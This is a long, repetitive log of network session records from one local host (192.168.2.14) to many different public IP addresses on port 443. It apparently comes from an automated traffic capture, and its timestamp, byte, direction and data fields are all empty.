                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18065192.168.2.1458908223.176.29.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18066192.168.2.1457176152.173.6.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18067192.168.2.145712440.150.122.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18068192.168.2.143685066.175.87.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18069192.168.2.1444306141.111.45.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18070192.168.2.144670641.115.137.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18071192.168.2.1446676186.200.158.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18072192.168.2.1459276217.234.190.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18073192.168.2.1454154192.120.84.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18074192.168.2.1453342219.133.170.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18075192.168.2.1451510166.44.226.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18076192.168.2.1442328117.178.17.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18077192.168.2.1440738138.221.237.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18078192.168.2.1448546143.121.8.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18079192.168.2.14476701.107.10.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18080192.168.2.144998854.41.44.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18081192.168.2.1433248113.233.211.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18082192.168.2.143816497.199.83.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18083192.168.2.1444946163.184.137.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18084192.168.2.1434704187.178.201.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18085192.168.2.1446348107.47.135.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18086192.168.2.1439764126.50.27.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18087192.168.2.1456928129.43.146.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18088192.168.2.143455025.138.51.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18089192.168.2.1440334211.37.126.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18090192.168.2.144482860.121.52.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18091192.168.2.144538619.99.54.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18092192.168.2.143393888.234.139.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18093192.168.2.1460052110.176.65.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18094192.168.2.145283894.129.11.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18095192.168.2.1451308221.247.187.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18096192.168.2.1437740146.207.149.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18097192.168.2.1459014114.68.156.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18098192.168.2.1441538223.119.227.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18099192.168.2.1439806213.104.83.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18100192.168.2.1446662208.55.254.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18101192.168.2.146009072.99.105.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18102192.168.2.143533269.168.223.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18103192.168.2.1443988138.99.197.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18104192.168.2.145636224.221.60.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18105192.168.2.1449130158.159.41.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18106192.168.2.1452212105.95.118.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18107192.168.2.1434966220.154.144.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18108192.168.2.1442638164.140.132.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18109192.168.2.144996663.146.37.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18110192.168.2.1444018178.143.100.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18111192.168.2.1434392181.2.54.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18112192.168.2.1434226204.246.69.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18113192.168.2.1440570128.166.118.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18114192.168.2.1451276205.119.200.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18115192.168.2.144736817.58.235.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18116192.168.2.145460012.48.147.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18117192.168.2.1442204138.59.107.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18118192.168.2.144041279.213.6.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18119192.168.2.145000466.253.16.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18120192.168.2.144461490.251.79.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18121192.168.2.144279847.70.168.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18122192.168.2.144788451.251.20.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18123192.168.2.1435506101.36.186.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18124192.168.2.144974027.181.130.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18125192.168.2.1456278175.23.183.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18126192.168.2.1456234208.195.79.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18127192.168.2.143562482.13.245.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18128192.168.2.14574629.96.143.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18129192.168.2.1434284213.93.195.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18130192.168.2.144686660.127.30.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18131192.168.2.1451194200.211.6.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18132192.168.2.1444838141.244.191.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18133192.168.2.14345424.3.253.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18134192.168.2.1453588132.88.138.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18135192.168.2.1455492130.209.164.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18136192.168.2.143621418.77.109.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18137192.168.2.1436920202.3.53.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18138192.168.2.143456693.123.195.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18139192.168.2.144234451.160.191.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18140192.168.2.1438468187.83.247.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18141192.168.2.145013674.237.18.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18142192.168.2.145810649.113.28.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18143192.168.2.1450382136.20.214.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18144192.168.2.1441152165.131.249.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18145192.168.2.145180443.212.185.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18146192.168.2.14496364.73.244.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18147192.168.2.145779434.247.193.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18148192.168.2.145098868.60.101.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18149192.168.2.143699454.232.255.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18150192.168.2.1450082163.134.220.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18151192.168.2.1432792201.166.135.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18152192.168.2.1458254123.160.82.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18153192.168.2.144672635.205.119.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18154192.168.2.1451046139.166.84.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18155192.168.2.1447100158.127.190.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18156192.168.2.144354059.61.165.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18157192.168.2.1450660175.231.59.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18158192.168.2.1451360135.193.14.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18159192.168.2.1440852200.10.124.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18160192.168.2.1435114149.147.225.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18161192.168.2.1442998167.162.116.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18162192.168.2.1457174135.132.214.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18163192.168.2.145993075.115.115.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18164192.168.2.1433362114.3.23.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18165192.168.2.1434880167.54.213.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18166192.168.2.145791459.27.27.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18167192.168.2.1450464104.32.232.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18168192.168.2.143611461.213.64.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18169192.168.2.14417169.199.194.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18170192.168.2.1448044198.172.108.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18171192.168.2.1454474181.26.245.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18172192.168.2.1458322184.52.94.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18173192.168.2.1437240209.173.103.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18174192.168.2.1434976139.77.228.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18175192.168.2.1452890184.126.243.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18176192.168.2.1444470207.42.121.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18177192.168.2.143358067.183.188.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18178192.168.2.1446530157.223.221.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18179192.168.2.146026423.189.102.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18180192.168.2.1460474190.27.56.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18181192.168.2.1440260218.93.37.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18182192.168.2.1434286195.140.38.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18183192.168.2.144109894.65.64.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18184192.168.2.143995261.53.2.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18185192.168.2.146046882.73.232.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18186192.168.2.1456144112.113.41.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18187192.168.2.143847480.14.248.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18188192.168.2.1437144153.250.132.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18189192.168.2.1436822167.18.58.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18190192.168.2.1458996120.28.51.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18191192.168.2.1438556147.46.246.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192192.168.2.144812081.181.121.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18193192.168.2.1448578175.253.103.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18194192.168.2.1436766106.187.39.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18195192.168.2.144213814.228.58.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18196192.168.2.1446920199.252.7.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18197192.168.2.1455836137.143.64.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18198192.168.2.1443034166.165.123.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18199192.168.2.145480467.150.89.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18200192.168.2.1458138191.99.237.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18201192.168.2.145532492.78.218.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18202192.168.2.145434478.156.67.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18203192.168.2.1451448112.99.196.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18204192.168.2.146078292.83.123.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18205192.168.2.1455610191.64.9.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18206192.168.2.1457796195.217.91.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18207192.168.2.1456458208.7.160.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18208192.168.2.1446788171.242.177.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18209192.168.2.1458848132.160.104.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18210192.168.2.1441870144.113.29.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18211192.168.2.1436706178.231.58.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18212192.168.2.1451404149.216.18.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18213192.168.2.1434294162.70.154.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18214192.168.2.144113423.191.22.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18215192.168.2.1447796106.244.95.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18216192.168.2.1444854134.203.31.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18217192.168.2.1453764213.21.6.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18218192.168.2.145239434.7.117.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18219192.168.2.1452058173.92.132.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18220192.168.2.144185045.95.110.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18221192.168.2.14577408.225.63.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18222192.168.2.1440650158.44.49.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18223192.168.2.143907652.185.30.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18224192.168.2.145824435.182.122.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18225192.168.2.1457028178.88.122.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18226192.168.2.1436632181.188.254.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18227192.168.2.1440424170.250.233.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18228192.168.2.14434804.67.24.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18229192.168.2.1459004185.170.16.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18230192.168.2.1450710165.120.29.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18231192.168.2.1448024188.199.42.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18232192.168.2.1444136178.228.236.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18233192.168.2.146024417.221.216.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18234192.168.2.1442906138.101.155.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18235192.168.2.146056069.41.122.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18236192.168.2.1435436103.188.53.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18237192.168.2.144919431.218.170.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18238192.168.2.1453714167.210.193.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18239192.168.2.1446636177.54.222.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18240192.168.2.145538881.239.44.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18241192.168.2.145290690.175.89.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18242192.168.2.145445231.249.172.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18243192.168.2.1442498170.2.217.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18244192.168.2.1435328166.125.253.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18245192.168.2.143900023.186.178.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18246192.168.2.1447138173.229.135.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18247192.168.2.1454152176.75.69.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18248192.168.2.145692032.129.251.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18249192.168.2.14418902.172.210.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18250192.168.2.1455392188.49.155.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18251192.168.2.1455566114.128.113.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18252192.168.2.1457246115.145.21.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18253192.168.2.143802878.41.218.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18254192.168.2.144134879.124.243.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18255192.168.2.143703290.192.255.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18256192.168.2.1450352218.83.22.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18257192.168.2.145110419.154.29.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18258192.168.2.146022049.56.148.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18259192.168.2.1434688192.99.72.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18260192.168.2.1451260178.227.109.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18261192.168.2.1438850177.222.231.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18262192.168.2.1433800167.113.33.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18263192.168.2.1450394143.197.128.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18264192.168.2.145861890.210.74.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18265192.168.2.1443894145.25.17.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18266192.168.2.1444050196.83.149.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18267192.168.2.1455742124.11.138.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18268192.168.2.1455468166.22.52.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18269192.168.2.145162078.244.234.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18270192.168.2.1450564137.218.66.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18271192.168.2.1451808184.249.102.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18272192.168.2.1441744125.147.186.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18273192.168.2.14550105.176.132.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18274192.168.2.145619427.189.24.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18275192.168.2.1436034164.212.213.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18276192.168.2.145415066.19.89.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
